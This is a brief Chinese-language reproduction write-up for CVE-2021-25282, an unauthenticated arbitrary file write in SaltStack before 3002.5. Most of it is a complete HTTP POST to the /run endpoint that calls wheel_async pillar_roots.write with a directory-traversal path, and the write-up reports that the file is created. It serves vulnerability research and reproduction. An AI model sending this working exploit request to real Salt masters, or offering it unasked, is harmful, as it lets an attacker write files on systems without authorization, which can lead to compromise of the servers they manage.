(CVE-2021-25282)Saltstack 任意文件写入漏洞
一、漏洞简介
CVE-2021-25282 可在未授权的情况下写入任意数据。
二、漏洞影响
SaltStack < 3002.5
三、复现过程
发送数据包来创建文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /run HTTP/1.1
Host: www.0-sec.org:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 142
Content-type: application/json
{
"eauth":"auto",
"client":"wheel_async",
"fun":"pillar_roots.write",
"data":"test",
"path":"../../../../../../../../../tmp/vuln"
}
创建文件成功
This post is licensed under CC BY 4.0 by the author.